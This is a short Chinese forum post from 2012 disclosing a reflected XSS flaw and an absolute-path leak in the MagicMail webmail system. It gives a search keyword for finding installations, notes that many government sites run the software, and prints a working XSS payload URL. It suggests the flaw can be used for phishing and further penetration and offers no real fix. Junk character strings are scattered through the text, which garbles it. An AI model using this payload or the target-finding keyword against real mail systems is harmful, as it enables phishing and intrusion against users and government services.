今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞/ Y- G1 u3 n" T3 v
7 r) A3 J! R( V" u/ p0 N2 p! |
& a; n- f$ ?( Q: K: V) I
包含 一个反射性XSS 以及 绝对路径泄漏4 M# m" r" h6 V/ c( @6 }
看了看 貌似全部是linux的。* n2 y$ `! G" ?- J/ L
& T* n1 ^$ b, ^4 J& v8 t
关键字:迈捷邮件系统 by MagicMail' @7 h7 e7 f2 g! z7 x
8 v7 \+ k) a, \# j0 T
可以看到很多政府网站都用这个邮件系统1 O3 r2 @' D- Z0 ~( p, |
( U! N7 M' i- L7 o% X
绝对路径 http://madman.in/index.php?login_type=declare&language=
, t$ G" ?& z- b( ] F4 v) b* ^( [5 \* T
1 x7 l" `4 ~; ]
2 ]1 [7 ]+ Y! a; h' l# I! l S
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E$ ]# X( Z" i5 {. ~# x
, P q% v+ n. t
1 ]% Q5 H$ l% ]; p; }/ Q W1 h R
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等% r. d4 [0 d8 d6 h
( W5 R9 x j# j+ z* [
修复方案:看官方补丁吧。* S7 g0 z8 Z$ o' j- j7 \
|
发表于 2012-11-9 20:38:41
收藏
支持
反对